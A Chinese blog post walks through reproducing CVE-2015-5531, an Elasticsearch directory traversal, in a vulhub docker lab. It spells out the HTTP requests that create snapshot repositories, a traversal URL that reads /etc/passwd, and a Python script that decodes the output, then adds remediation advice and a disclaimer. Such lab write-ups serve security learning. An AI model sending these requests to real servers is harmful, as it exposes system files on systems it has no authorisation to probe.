• 漏洞复现-CVE-2015-5531-ElasticSearch 目录穿越


     
     
     
     
     

    0x00 实验环境

    攻击机:Win 10

    靶场:docker拉的vulhub靶场

    0x01 影响版本

    1.6.1以下

    0x02 漏洞复现

    (1)访问存在的漏洞页面:(9200一般为ElasticSearch的常用端口)

    (2)新建仓库

    PUT /_snapshot/test HTTP/1.1
    Host:IP:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 110
    
    {
        "type": "fs",
        "settings": {
            "location": "/usr/share/elasticsearch/repo/test" 
        }
    }

     (3)新建快照

    PUT /_snapshot/test2 HTTP/1.1
    Host: IP:9200
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 128
    
    {
        "type": "fs",
        "settings": {
            "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
        }
    }

     (4)访问http://IP:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd,可读取到服务器的账号信息,是ascii编码的,需要自行解码,以下为解码的脚本:

    p='114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, 117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10'
    q=p.replace(',','')  #将数值中间的/替换为,
    
    list = q.split(" ") #将字符串转换为列表
    
    
    list2=[]
    
    for i in list:
        x=int(i)
        str = chr(x)
        list2.append(str)  #将列表里的int型的ascii数值转换为字符串类型并加入至空列表内
    
    print(list2)
    ss=''.join(list2) #将列表转换为字符串
    print(ss)

     

    POC的话自己去找吧,这个我觉得还是发包解码好很多。

    String.fromCharCode(98)在浏览器的console执行也可以转换:

    0x03 漏洞原理

    找了半天没找到漏洞原理,写个大概的吧:

    1.5.1及以前,无需任何配置即可触发该漏洞。之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。

     

    0x04 修复建议

    1、升级版本

    2、将repo目录权限设置为仅可读,不可写(自己建议的,仅在不影响业务的前提下)

    0x05 参考文献

    https://www.cnblogs.com/qianxiao996/p/13574645.html

    0x06 免责声明

    本漏洞复现文章仅用于学习、工作与兴趣爱好,并立志为网络安全奉献一份力量,凡是利用本博客相关内容的无良hackers造成的安全事故均与本人无关!

  • 相关阅读:
    Flip Game
    Python中apply用法学习【转载】
    Py-lamda表达式学习【转载】
    Py中的多维数组ndarray学习【转载】
    超几何分布与应用【转载】
    Fisher精确检验【转载】
    置换检验(Permutation Test)学习[转载]
    BGD-py实现学习【1】[转载]
    R实现的最小二乘lsfit函数学习
    对生信与计算生物的一点认识[转载]
  • 原文地址:https://www.cnblogs.com/cute-puli/p/15352608.html
Copyright © 2020-2023  润新知